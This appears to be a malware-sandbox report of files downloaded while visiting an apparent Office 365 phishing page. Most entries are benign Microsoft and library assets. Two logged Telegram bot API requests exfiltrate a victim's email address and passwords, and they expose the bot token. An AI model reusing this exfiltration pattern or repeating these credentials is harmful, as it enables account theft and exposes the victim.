                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><title>assets</title><path d="M18,11.578v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944.594.594L7.617,11.578Z" fill="#404040"/><path d="M10.944,7.056l.594.594L7.617,11.578H18v.844H7.617l3.921,3.928-.594.594L6,12l4.944-4.944m0-.141-.071.07L5.929,11.929,5.858,12l.071.071,4.944,4.944.071.07.071-.07.594-.595.071-.07-.071-.071L7.858,12.522H18.1V11.478H7.858l3.751-3.757.071-.071-.071-.07-.594-.595-.071-.07Z" fill="#404040"/></svg>
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                        Category:downloaded
                        Size (bytes):673
                        Entropy (8bit):7.6596900876595075
                        Encrypted:false
                        SSDEEP:
                        MD5:0E176276362B94279A4492511BFCBD98
                        SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                        SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                        SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                        Malicious:false
                        Reputation:low
                        URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                        Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
                        Category:downloaded
                        Size (bytes):132196
                        Entropy (8bit):5.372671085317282
                        Encrypted:false
                        SSDEEP:
                        MD5:9053B729DEEF9E0A3952B298C993E251
                        SHA1:776A9D792B8C38AD537A563D2E716D65AD5963E7
                        SHA-256:555AAF0A4DAACE8F2D49EE1FF0428C7AE3CE4CE229E88EDE1A0C6217FFB2B80C
                        SHA-512:E23075E3BB108CC16B29A4A1337BB6CCA56D17434D2CD2643408C0DEE89DAC800BF517FA702D712ED42EDE0E114B878629EC0BDC29D01C3AF81BA2B4B9ADE224
                        Malicious:false
                        Reputation:low
                        URL:https://support.microsoft.com/SocContent/css
                        Preview:@font-face{font-family:'OffSMDL2';src:url('/socfonts/OffSMDL2.4.50.woff') format('woff')}@font-face{font-family:'SupportMDL2';src:url('/socfonts/SupMDL2.4.66.woff') format('woff')}.HeaderUIFont{font-size:10pt;font-family:'Segoe UI Light','Segoe WP Light','wf_segoe-ui_light','wf_segoe-ui_normal','Segoe UI','Segoe WP',Helvetica,Tahoma,Arial,sans-serif;font-weight:300}.HeaderUIFont.macexcel,.HeaderUIFont.maconenote,.HeaderUIFont.macoutlook,.HeaderUIFont.macpowerpoint,.HeaderUIFont.macword{font-family:-apple-system,'Segoe UI Light','Segoe WP Light','wf_segoe-ui_light','wf_segoe-ui_normal','Segoe UI','Segoe WP',Helvetica,Tahoma,Arial,sans-serif}.HeaderUIFont.macexcel,.HeaderUIFont.maconenote,.HeaderUIFont.macoutlook,.HeaderUIFont.macpowerpoint,.HeaderUIFont.macword{font-family:-apple-system,'Segoe UI Light','Segoe WP Light','wf_segoe-ui_light','wf_segoe-ui_normal','Segoe UI','Segoe WP',Helvetica,Tahoma,Arial,sans-serif}.FooterUIFont{font-size:9pt;font-family:'wf_segoe-ui_semilight','wf_sego
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:RIFF (little-endian) data, Web/P image
                        Category:downloaded
                        Size (bytes):31578
                        Entropy (8bit):7.982885431692689
                        Encrypted:false
                        SSDEEP:
                        MD5:ED7F9B571326AD6E974C9A21B2881D31
                        SHA1:6318ABCD8BE002C892FD9B306033C64FCE809B96
                        SHA-256:852C1EC9D3CEA82ACE52632CDE6A2EB44BA95B1281DCD725D5FBFECD564DA98E
                        SHA-512:0E141B50598EA78FD00E7706BE48CCCA3DDD7F44108B42FB217D080B834D61A89B4E3F0D52121A5277F3D39537876AE8B6CCA4E5F55A55CC9CF32ACB86D58B30
                        Malicious:false
                        Reputation:low
                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/e/e1/Microsoft_Office_SharePoint_%282019%E2%80%93present%29.svg/1200px-Microsoft_Office_SharePoint_%282019%E2%80%93present%29.svg.png
                        Preview:RIFFR{..WEBPVP8LE{../..$..8n.F. .._.f2...".?...=H.l3M.l..%...-........BM../...kP....oW..&wub.....+S...A..........<........v....}..d..!...D...`C...uas.g6K....v....^4.... .. Ig.\.o.F......8.2.....[..?.(7;7...6..*...GDD_........./.m.jV..`..o!._..`......`gt".+5.....8....L.. 6...@..]...[..`...(.....x....,tgx.q#.......1..........uk....|B.....[...J..y0SA@.q.\rX.Y...<.<c..\.N..Q,...C..I.N.a7.,.\2.Y.c......,<.a..<.\..@H..F..{.....u...3.S3......$...G....." r..cG..u.!A.#..h.O..[.+.....ip.6...x.&.......u...........c?."..9..c.........xv.)S...>.*....35.....B7t.`?......f..J.......B...l..'..}....+.......o~{K......89..../a.u...$I.T.'=_.......>....c..$....;.ag"....../..H...G...e...Z.P.S/.64`..W.c......|L.D.Tq.}eZ@(.*...5..m.U.ofWjq.Y-.j....jm..*...p....A.*(w.m.m....=Sj..^...2.s.&s.....&...I..K...\e..?.E.0.&..f.=.k[Rm...A.<....I.-.a>G......1.zh..Z.j..PMv`..XZ...m[U.y.#%....:.B.T....8dd..A$I...w.....b.vSm.\.......8..<.......]... I..:r...{...,...O"u........aN!+3s.
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:JSON data
                        Category:downloaded
                        Size (bytes):694
                        Entropy (8bit):5.557161696687906
                        Encrypted:false
                        SSDEEP:
                        MD5:6CE3CBCFB4A0C8CBFB3E834D3D2BC442
                        SHA1:3783BB87A681DD57D4B2BE28BD65D160B8808086
                        SHA-256:51909580061BDE8E9CE89F714D384DFC666C7C7E049BEECFA6C962FBF5074EDD
                        SHA-512:FF96850DDCB3FF13BEA51E5A84D099BCE21A39484A81E5C900C54EE3C0935F519B65AA33DD4452121069F94A3819FF514EB93FBD1BB8BFDF8729710BB2F03ABC
                        Malicious:false
                        Reputation:low
                        URL:"https://api.telegram.org/bot6299120601:AAFjTF1nw1mX4IfZ5iID5kg7WRm_MNdlcuw/sendMessage?chat_id=-801041529&text=%3Cb%3EOFFICE365-HTML-LOGS@ZERO%3C/b%3E%0A[2]%2021/03/2023%0A%3Cb%3EUSER-AGENT:%20%3C/b%3EMozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/104.0.0.0%20Safari/537.36%0A%3Ca%3Esee%20me:%20@mrcew%3C/a%3E%0A%3Cb%3EEMAIL:%20%3C/b%3E%3Cpre%3Evdaponte@sumhlc.org%3C/pre%3E%0A%3Cb%3EPASSWORD:%20%3C/b%3E%3Ca%3Etemper233"
                        Preview:{"ok":true,"result":{"message_id":283,"from":{"id":6299120601,"is_bot":true,"first_name":"asgardnewbox_2023LOGS","username":"asgardnewbox_2023LOGS_bot"},"chat":{"id":-801041529,"title":"asgarrd","type":"group","all_members_are_administrators":true},"date":1679409841,"text":"<b>OFFICE365-HTML-LOGS@ZERO</b>\n[2] 21/03/2023\n<b>USER-AGENT: </b>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36\n<a>see me: @mrcew</a>\n<b>EMAIL: </b><pre>vdaponte@sumhlc.org</pre>\n<b>PASSWORD: </b><a>temper233","entities":[{"offset":154,"length":9,"type":"url"},{"offset":189,"length":6,"type":"mention"},{"offset":219,"length":19,"type":"email"}]}}
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:Unicode text, UTF-8 text, with very long lines (63888), with no line terminators
                        Category:downloaded
                        Size (bytes):279220
                        Entropy (8bit):6.058071014041615
                        Encrypted:false
                        SSDEEP:
                        MD5:5F524E20CE61F542125454BAF867C47B
                        SHA1:7E9834FD30DCFD27532CE79165344A438C31D78B
                        SHA-256:C688D3F2135B6B51617A306A0B1A665324402A00A6BCEBA475881AF281503AD9
                        SHA-512:224A6E2961C75BE0236140FED3606507BCA49EB10CB13F7DF2BCFBB3B12EBECED7107DE7AA8B2B2BB3FC2AA07CD4F057739735C040EF908381BE5BC86E0479B2
                        Malicious:false
                        Reputation:low
                        URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                        Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var a={};function i(n){if(a[n])return a[n].exports;var o=a[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,i),o.l=!0,o.exports}return i.m=e,i.c=a,i.d=function(e,a,n){i.o(e,a)||Object.defineProperty(e,a,{enumerable:!0,get:n})},i.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},i.t=function(e,a){if(1&a&&(e=i(e)),8&a)return e;if(4&a&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(i.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&a&&"string"!=typeof e)for(var o in e)i.d(n,o,function(a){return e[a]}.bind(null,o));return n},i.n=function(e){var a=e&&e.__esModule?function(){return e.default}:function(){return e};return i.d(a,"a",a),a},i.o=function(e,a){return Object.prototype.hasOwnProperty.call(e,a)},i.p="",i(i.s=3)}([function(e,a,i)
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (65451)
                        Category:downloaded
                        Size (bytes):89476
                        Entropy (8bit):5.2896589255084425
                        Encrypted:false
                        SSDEEP:
                        MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                        SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                        SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                        SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                        Malicious:false
                        Reputation:low
                        URL:https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.5.1.min.js
                        Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (2867), with no line terminators
                        Category:downloaded
                        Size (bytes):2872
                        Entropy (8bit):5.2233300794694175
                        Encrypted:false
                        SSDEEP:
                        MD5:815BE08F616A5FBC214EF097B9C63008
                        SHA1:20CF7874FD54C8665EC8144628FB033D76E8067C
                        SHA-256:0F60BF1F176081D7C33C63523B457692F7A7FA8EDCD5D0D16B0CE4E8680ECCBD
                        SHA-512:BA0269C6ABE139394D12054A157DBD76BA76148C7B8F0362EBADB1D27254CF7A6B2F040BA79BD8C6BB7F09FD22D6D549344003524C6CCA35623CC53AC494AE9D
                        Malicious:false
                        Reputation:low
                        URL:https://support.microsoft.com/css/TopNav/top-nav.css?v=y3fVhNR8laayLSfo-P3Q-CBl74RjRTQT6GeXgXCLJoc
                        Preview:.@font-face{font-family:"Support MDL2 Assets";src:url("../Glyphs/SupMDL2_v4_69.woff2") format("woff2"),url("../Glyphs/SupMDL2_v4_69.woff") format("woff")}#topNav{font-family:"Segoe UI","Segoe UI Web","Segoe WP","wf_segoe-ui_normal",Helvetica,Tahoma,Arial,sans-serif;font-weight:normal;font-size:13px}#topNav *{box-sizing:border-box}#topNav .topNavDropdownMenu{display:none;font-size:13px;display:none;left:0;position:absolute;right:0;z-index:1000;width:260px;padding-top:10px;padding-bottom:10px}#topNav .topNavDropdownMenu.activeMenu{display:block;width:fit-content}#topNav a[data-bi-name^=MNU_]{font-weight:bold}#topNav a.topNavDropdownTrigger{padding:11.5px 18px}#topNav .topNav{font-size:13px}#topNav .topNavDropdownMenuItem a{font-size:13px}#topNav .topNavDropdownMenuItem:hover{background-color:#cecece}#topNav .topNavActiveCategory>.topNavDropdownTrigger{font-size:13px;color:#1e1e1e;position:relative;z-index:1001}#topNav .topNavCategory{display:inline-block;position:relative}#topNav .topN
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (4873), with no line terminators
                        Category:downloaded
                        Size (bytes):4873
                        Entropy (8bit):5.2268236765669895
                        Encrypted:false
                        SSDEEP:
                        MD5:ED927CF0F8A1BE103DF48446270416EE
                        SHA1:F7B2BE7FC2B063AAC03E76DF9F3E19D615970213
                        SHA-256:EBDD298DFD39A35E5F54469F12953081A17CBEA55F3A4A79C0FD4997D804F7D5
                        SHA-512:FCA692C8C7B104FB00C2E6D90C1A0D52A0FF93CDA626338D8FA114A0E9DCE2504DF9282868F98A46648A6E616A96ACD14CAD0460D72477421C8F5EE8F7D34256
                        Malicious:false
                        Reputation:low
                        URL:https://support.microsoft.com/css/MeControlCallout/teaching-callout.css?v=690pjf05o15fVEafEpUwgaF8vqVfOkp5wP1Jl9gE99U
                        Preview:.teachingCalloutPopover{position:absolute;z-index:10000;top:45px;width:336px;right:2vw;color:#000;background-color:#fff;border:1px solid #000;box-sizing:content-box}.teachingCalloutPopover .caretArrow{position:absolute;display:block;width:1rem;height:.5rem;margin:0 .3rem}.teachingCalloutPopover .caretArrow::before{position:absolute;display:block;content:"";border-color:transparent;border-style:solid}.teachingCalloutPopover .caretArrow::after{position:absolute;display:block;content:"";border-color:transparent;border-style:solid}.teachingCalloutPopover .caretArrowPosition{left:215px}.teachingCalloutPopover .win-icon{font-family:"Dev Center MDL2 Assets";font-style:normal;font-weight:normal;line-height:1;position:relative;top:1px;display:inline-block;vertical-align:baseline;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}#teachingCalloutDismiss,#teachingCalloutMessages{color:#000}.teachingCalloutHidden{visibility:hidden}.calloutMessageHidden{display:none}.caretArrowUp{
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (342), with CRLF line terminators
                        Category:downloaded
                        Size (bytes):1531
                        Entropy (8bit):4.797455242405607
                        Encrypted:false
                        SSDEEP:
                        MD5:A570448F8E33150F5737B9A57B6D889A
                        SHA1:860949A95B7598B394AA255FE06F530C3DA24E4E
                        SHA-256:0BD288D5397A69EAD391875B422BF2CBDCC4F795D64AA2F780AFF45768D78248
                        SHA-512:217F971A8012DE8FE170B4A20821A52FA198447FA582B82CF221F4D73E902C7E3AA1022CB0B209B6679C2EAE0F10469A149F510A6C2132C987F46214B1E2BBBC
                        Malicious:false
                        Reputation:low
                        URL:https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css
                        Preview:a.c-call-to-action:hover, button.c-call-to-action:hover{box-shadow:none!important}a.c-call-to-action:hover span, button.c-call-to-action:hover span{left:0!important}...c-call-to-action:not(.glyph-play):after { right: 0!important;} a.c-call-to-action:focus,button.c-call-to-action:focus{box-shadow:none!important}a.c-call-to-action:focus span,button.c-call-to-action:focus span{left:0!important;box-shadow:none!important}...theme-dark .c-me .msame_Header_name {color: #f2f2f2;}...pmg-page-wrapper .uhf div, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf span, .pmg-page-wrapper .uhf p, .pmg-page-wrapper .uhf input {font-family: Segoe UI,SegoeUI,Helvetica Neue,Helvetica,Arial,sans-serif !important;}..@media (min-width: 540px) {.pmg-page-wrapper .uhf .c-uhfh-alert span, .pmg-page-wrapper .uhf #uhf-g-nav span, .pmg-page-wrapper .uhf .c-uhfh-actions span, .pmg-page-wrapper .uhf li, .pmg-page-wrapper .uhf button, .pmg-page-wrapper .uhf a, .pmg-page-wrapper .uhf #meC
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:Unicode text, UTF-8 (with BOM) text
                        Category:downloaded
                        Size (bytes):23427
                        Entropy (8bit):5.112735417225198
                        Encrypted:false
                        SSDEEP:
                        MD5:BA0537E9574725096AF97C27D7E54F76
                        SHA1:BD46B47D74D344F435B5805114559D45979762D5
                        SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
                        SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                        Malicious:false
                        Reputation:low
                        URL:https://www.w3schools.com/w3css/4/w3.css
                        Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (1576), with no line terminators
                        Category:downloaded
                        Size (bytes):1576
                        Entropy (8bit):5.141392770238462
                        Encrypted:false
                        SSDEEP:
                        MD5:505830644E0EEB03349C0142A5C96376
                        SHA1:2D773975C260209FCFBBBB21FF12E23BE237F1B7
                        SHA-256:9A2DACAA69B83B0479BF5C531E5601D7896361456480AA2399349A966030B8BB
                        SHA-512:61CACBA8877890AE418F81302C5F72216AF0D95E2F355363C508383BCDEFD22C142E21310C1D5E2A83AD3E8E0BE9071952214D73A966D5528440FA3D5AB05414
                        Malicious:false
                        Reputation:low
                        URL:https://support.microsoft.com/SocContent/officeShared
                        Preview:html,body{height:auto}h2.ocExpandoHead,.ocExpandoBody p{font-family:'wf_segoe-ui_semilight','wf_segoe-ui_light',Arial,"Helvetica Neue",Verdana,Helvetica,Sans-Serif}h2.ocExpandoHead.macexcel,.ocExpandoBody p.macexcel,h2.ocExpandoHead.maconenote,.ocExpandoBody p.maconenote,h2.ocExpandoHead.macoutlook,.ocExpandoBody p.macoutlook,h2.ocExpandoHead.macpowerpoint,.ocExpandoBody p.macpowerpoint,h2.ocExpandoHead.macword,.ocExpandoBody p.macword{font-family:-apple-system,'wf_segoe-ui_semilight','wf_segoe-ui_light',Arial,"Helvetica Neue",Verdana,Helvetica,Sans-Serif}h2.ocExpandoHead{border-top:solid 1px #cecece;cursor:pointer;font-size:18px;margin-top:0}h2.ocExpandoHead span{font-size:5px}h2.ocExpandoHead:first-child{border-top:none}h2.ocExpandoHead.opened{background-position-y:69%}h2.ocExpandoHead a{text-decoration:none;padding-top:13px;padding-bottom:12px;display:block}div.ocExpandoBody{display:none}div.ocExpandoBody>p{margin-top:0;padding-left:26px}div.ocExpandoBody p a{color:#2c71b8;font-size
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:JSON data
                        Category:downloaded
                        Size (bytes):694
                        Entropy (8bit):5.553630599268126
                        Encrypted:false
                        SSDEEP:
                        MD5:BDD40483974AD0A4EABD106667CAD329
                        SHA1:4F293784FEFAE7F5009A3BEC7C3A9443FC48695E
                        SHA-256:BD84968C122D3784985132217E28E9809E423ED6BD71214A320553A730C5B188
                        SHA-512:BBF049906778387726D8C2B772110250C87E85573CE3B707E771453A4025C8D8AE5AD955FB5CE3190275868C9D940AB5E64639271FE6BB51F4710517881C3197
                        Malicious:false
                        Reputation:low
                        URL:"https://api.telegram.org/bot6299120601:AAFjTF1nw1mX4IfZ5iID5kg7WRm_MNdlcuw/sendMessage?chat_id=-801041529&text=%3Cb%3EOFFICE365-HTML-LOGS@ZERO%3C/b%3E%0A[1]%2021/03/2023%0A%3Cb%3EUSER-AGENT:%20%3C/b%3EMozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/104.0.0.0%20Safari/537.36%0A%3Ca%3Esee%20me:%20@mrcew%3C/a%3E%0A%3Cb%3EEMAIL:%20%3C/b%3E%3Cpre%3Evdaponte@sumhlc.org%3C/pre%3E%0A%3Cb%3EPASSWORD:%20%3C/b%3E%3Ca%3Etemeper23"
                        Preview:{"ok":true,"result":{"message_id":282,"from":{"id":6299120601,"is_bot":true,"first_name":"asgardnewbox_2023LOGS","username":"asgardnewbox_2023LOGS_bot"},"chat":{"id":-801041529,"title":"asgarrd","type":"group","all_members_are_administrators":true},"date":1679409825,"text":"<b>OFFICE365-HTML-LOGS@ZERO</b>\n[1] 21/03/2023\n<b>USER-AGENT: </b>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36\n<a>see me: @mrcew</a>\n<b>EMAIL: </b><pre>vdaponte@sumhlc.org</pre>\n<b>PASSWORD: </b><a>temeper23","entities":[{"offset":154,"length":9,"type":"url"},{"offset":189,"length":6,"type":"mention"},{"offset":219,"length":19,"type":"email"}]}}
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:ASCII text, with very long lines (65398)
                        Category:downloaded
                        Size (bytes):139129
                        Entropy (8bit):5.444859220439254
                        Encrypted:false
                        SSDEEP:
                        MD5:49BFEAE3B40B37A8F951103046309AD9
                        SHA1:873A7A11FA10401D6D10005E8DBAD6E58DDB7AA1
                        SHA-256:7F5B64709E131C5C20CDB5E3769003FF946C4BEE28852E32C590D2E058127597
                        SHA-512:6B4FAF35A9DC0D07C0D4EECAF730A40A8A15662AC6A5886F20E975F1181EF7BF7EBBB3D6DDB4B9AFE1E385B33B8E084E54D5A707378AEC6DCA2C261D2913B03E
                        Malicious:false
                        Reputation:low
                        URL:https://js.monitor.azure.com/scripts/c/ms.analytics-web-3.2.7.min.js
                        Preview:/*!. * 1DS JS SDK Analytics Web, 3.2.7. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.var e=this,t=function(n){"use strict";var u="function",s="object",le="undefined",f="prototype",l="hasOwnProperty",g=Object,v=g[f],y=g.assign,T=g.create,e=g.defineProperty,I=v[l],C=null;function b(e){return void 0===e&&(e=!0),C&&e||(typeof globalThis!==le&&globalThis&&(C=globalThis),typeof self!==le&&self&&(C=self),typeof window!==le&&window&&(C=window),typeof global!==le&&global&&(C=global)),C}function S(e){throw new TypeError(e)}function M(e){var t;return T?T(e):null==e?{}:((t=typeof e)!==s&&t!==u&&S("Object prototype may only be an Object:"+e),n[f]=e,new n);function n(){}}(b()||{}).Symbol,(b()||{}).Reflect;var fe=y||function(e){for(var t,n=1,i=arguments.length;n<i;n++)for(var r in t=arguments[n])v[l].call(t,r)&&(e[r]=t[r]);return e},N=function(e,t){return(N=g.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:JSON data
                        Category:downloaded
                        Size (bytes):250
                        Entropy (8bit):4.880286917856239
                        Encrypted:false
                        SSDEEP:
                        MD5:6A3F795F0177F117E6EBB553F149D215
                        SHA1:9CBB868DED202E40E1B6EFBE90EC15913766DB59
                        SHA-256:6B49D4E424938A8828B2A155FF0FA364945C3246AE0797BC2FEF9A83823EAFFF
                        SHA-512:EF85386CAF2AC7126D082E34ED9F7AF71BCF83C8001A28E56F3374941944011DC3C88D8CADED38787CCFE816009F18DBB1428C68B9F3769F9BEA40119CB45EF0
                        Malicious:false
                        Reputation:low
                        URL:https://ipinfo.io/json
                        Preview:{. "ip": "102.129.143.5",. "city": "H.nenberg",. "region": "Zug",. "country": "CH",. "loc": "47.1754,8.4250",. "org": "AS212238 Datacamp Limited",. "postal": "6331",. "timezone": "Europe/Zurich",. "readme": "https://ipinfo.io/missingauth".}
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:SVG Scalable Vector Graphics image
                        Category:downloaded
                        Size (bytes):1555
                        Entropy (8bit):3.9986369032270845
                        Encrypted:false
                        SSDEEP:
                        MD5:BCB4D1DC4EAE64F0B2B2538209D8435A
                        SHA1:4F10568BC1B70BC98D5297B85812C33B3E636766
                        SHA-256:A76C08E9CDC3BB87BFB57627AD8F6B46F0E5EF826CC7F046DFBAF25D7B7958EA
                        SHA-512:DB41DE25233B7000DD841D244CA2A7504E4B1443A7CF41AA88136764EEB3002B3B99D0E8B31A828AFE4749F454ADCF5D2E4F9F72D645F0A6E66918B5E5A8A7B1
                        Malicious:false
                        Reputation:low
                        URL:https://logincdn.msauth.net/shared/1.0/content/images/documentation_bcb4d1dc4eae64f0b2b2538209d8435a.svg
                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path d="M8,0a7.876,7.876,0,0,1,2.126.285,8.011,8.011,0,0,1,5.589,5.589,8.072,8.072,0,0,1,0,4.252,8.011,8.011,0,0,1-5.589,5.589,8.072,8.072,0,0,1-4.252,0A8.011,8.011,0,0,1,.285,10.126a8.072,8.072,0,0,1,0-4.252A8.011,8.011,0,0,1,5.874.285,7.876,7.876,0,0,1,8,0M8,15a6.863,6.863,0,0,0,1.858-.251,7.076,7.076,0,0,0,1.673-.707,6.994,6.994,0,0,0,2.507-2.507,7.076,7.076,0,0,0,.707-1.673,7,7,0,0,0,0-3.716,7.076,7.076,0,0,0-.707-1.673,6.994,6.994,0,0,0-2.507-2.507,7.076,7.076,0,0,0-1.673-.707,7,7,0,0,0-3.716,0,7.076,7.076,0,0,0-1.673.707A6.994,6.994,0,0,0,1.962,4.469a7.076,7.076,0,0,0-.707,1.673,7,7,0,0,0,0,3.716,7.076,7.076,0,0,0,.707,1.673,6.994,6.994,0,0,0,2.507,2.507,7.076,7.076,0,0,0,1.673.707A6.863,6.863,0,0,0,8,15m-.536-3.247H8.536V12.82H7.464V11.749M8,3.715a2.558,2.558,0,0,1,1.038.214,2.737,2.737,0,0,1,1.426,1.427,2.533,2.533,0,0,1,.214,1.037,2.215,2.215,0,0,1-.159.875,2.921,2.921,0,0,
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:Unicode text, UTF-8 text, with very long lines (65518), with no line terminators
                        Category:downloaded
                        Size (bytes):131952
                        Entropy (8bit):5.245222429754902
                        Encrypted:false
                        SSDEEP:
                        MD5:3D31F4B722BAAAAF922911817D23EB0B
                        SHA1:67B66EA9B1D0CA23FAD6407F75B6114739D96CC9
                        SHA-256:139092C5F8D46536023B1E564CAEA7D460A14E731D82C31BE4BB80A7E5BAD4B9
                        SHA-512:0243BAE79FAA7EF5962BF2E1CBD38585F5A88700883620902452F568C05158C7D1DCE1EA3FD5CC8BF00ECCE6EA4829DCA6A7710D9498D9E16E4137E8D519FAAF
                        Malicious:false
                        Reputation:low
                        URL:https://support.microsoft.com/SocContent/articleCss
